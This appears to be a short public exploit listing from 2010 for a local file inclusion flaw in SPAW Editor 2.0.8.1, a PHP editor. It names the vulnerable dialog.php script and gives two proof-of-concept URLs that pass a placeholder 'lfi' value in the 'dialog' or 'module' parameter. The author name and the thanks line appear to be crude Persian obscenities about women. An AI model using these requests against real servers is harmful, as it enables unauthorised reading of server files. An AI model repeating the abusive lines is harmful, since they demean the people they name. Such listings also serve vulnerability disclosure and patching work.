SPAW Editor 2.0.8.1 - Local File Inclusion

EDB-ID:

15209

CVE:

N/A




Platform:

PHP

Date:

2010-10-05


# Exploit Title: local file include 
# Date: 
# Author: soorakh kos

# Software Link: http://sourceforge.net/projects/spaw/files/spaw-php/SPAW%20PHP%20v.2.0.8.1/spaw-php-2081-gpl.zip/download

# Version: SPAW Editor v.2

# Thanks:  kose roya , kose soosan , kose amam,kose dokhtar amam ,and all jaghi iranian boys
-----------


vul code: /path/dialogs/dialog.php

------------------------------------------------

poc:
/path/dialogs/dialog.php?dialog=lfi
/path/dialogs/dialog.php?module=lfi